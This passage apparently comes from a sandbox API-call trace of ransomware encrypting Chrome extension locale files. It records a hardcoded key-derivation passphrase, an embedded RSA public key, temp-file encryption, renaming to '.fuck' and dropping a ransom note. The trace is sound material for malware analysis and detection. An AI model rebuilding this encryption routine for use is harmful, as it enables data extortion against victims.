lpOverlapped=0x0 | out: lpBuffer=0x2e17508*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.328] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xcf, lpOverlapped=0x0) returned 1 [0254.329] CryptEncrypt (in: hKey=0x2e187e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xcf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0254.329] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0254.329] CloseHandle (hObject=0x5d60) returned 1 [0254.329] CloseHandle (hObject=0x5d5c) returned 1 [0254.329] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0254.333] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0254.334] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0254.335] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0254.336] CryptDestroyHash (hHash=0x2e186e8) returned 1 [0254.336] CryptDestroyKey (hKey=0x2e187e8) returned 1 [0254.336] CryptReleaseContext (hProv=0x2e167c0, dwFlags=0x0) returned 1 [0254.337] FindNextFileA (in: hFindFile=0x2e185e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.337] FindClose (in: hFindFile=0x2e185e8 | out: hFindFile=0x2e185e8) returned 1 [0254.337] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0254.337] AreFileApisANSI () returned 1 [0254.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.337] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.338] GetFileType (hFile=0x5d50) returned 0x1 [0254.339] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.340] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.340] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18428 [0254.341] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.341] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.342] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.342] GetLastError () returned 0x0 [0254.342] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json")) returned 0x20 [0254.342] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0254.343] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.343] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.344] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.345] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e16ea8) returned 1 [0254.348] CryptCreateHash (in: hProv=0x2e16ea8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.348] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.348] CryptHashData (hHash=0x2e181a8, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.348] CryptDeriveKey (in: hProv=0x2e16ea8, Algid=0x6610, hBaseData=0x2e181a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e184e8) returned 1 [0254.349] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.349] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.349] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e168d0) returned 1 [0254.349] CryptImportPublicKeyInfo (in: hCryptProv=0x2e168d0, dwCertEncodingType=0x1, pInfo=0x298f030*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f060*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f068*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18328) returned 1 [0254.349] CryptEncrypt (in: hKey=0x2e18328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.350] CryptEncrypt (in: hKey=0x2e18328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17480*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17480*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.350] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e17480*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17480*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.351] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xad, lpOverlapped=0x0) returned 1 [0254.354] CryptEncrypt (in: hKey=0x2e184e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xad, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0254.354] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0254.355] CloseHandle (hObject=0x5d5c) returned 1 [0254.355] CloseHandle (hObject=0x5d60) returned 1 [0254.355] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), bFailIfExists=0) returned 1 [0254.359] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json", dwFileAttributes=0x0) returned 1 [0254.360] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.gsg")) returned 1 [0254.361] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.fuck")) returned 1 [0254.363] CryptDestroyHash (hHash=0x2e181a8) returned 1 [0254.363] CryptDestroyKey (hKey=0x2e184e8) returned 1 [0254.363] CryptReleaseContext (hProv=0x2e16ea8, dwFlags=0x0) returned 1 [0254.363] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.363] FindClose (in: hFindFile=0x2e18428 | out: hFindFile=0x2e18428) returned 1 [0254.363] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\readme_back_files.htm")) returned 0xffffffff [0254.363] AreFileApisANSI () returned 1 [0254.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.364] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.365] GetFileType (hFile=0x5d50) returned 0x1 [0254.365] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.366] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.366] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18428 [0254.367] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.367] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.367] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.367] GetLastError () returned 0x0 [0254.367] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json")) returned 0x20 [0254.367] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0254.368] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.368] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.369] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.370] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e16b78) returned 1 [0254.373] CryptCreateHash (in: hProv=0x2e16b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.373] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.373] CryptHashData (hHash=0x2e185e8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.373] CryptDeriveKey (in: hProv=0x2e16b78, Algid=0x6610, hBaseData=0x2e185e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18468) returned 1 [0254.373] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.373] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.373] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e17618) returned 1 [0254.374] CryptImportPublicKeyInfo (in: hCryptProv=0x2e17618, dwCertEncodingType=0x1, pInfo=0x298e400*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e430*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e438*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e187a8) returned 1 [0254.374] CryptEncrypt (in: hKey=0x2e187a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.374] CryptEncrypt (in: hKey=0x2e187a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e16958*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e16958*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.374] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e16958*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e16958*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.375] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xac, lpOverlapped=0x0) returned 1 [0254.377] CryptEncrypt (in: hKey=0x2e18468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xac, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0254.377] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0254.377] CloseHandle (hObject=0x5d60) returned 1 [0254.377] CloseHandle (hObject=0x5d5c) returned 1 [0254.377] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0254.383] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0254.383] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.gsg")) returned 1 [0254.385] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.fuck")) returned 1 [0254.386] CryptDestroyHash (hHash=0x2e185e8) returned 1 [0254.386] CryptDestroyKey (hKey=0x2e18468) returned 1 [0254.386] CryptReleaseContext (hProv=0x2e16b78, dwFlags=0x0) returned 1 [0254.387] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 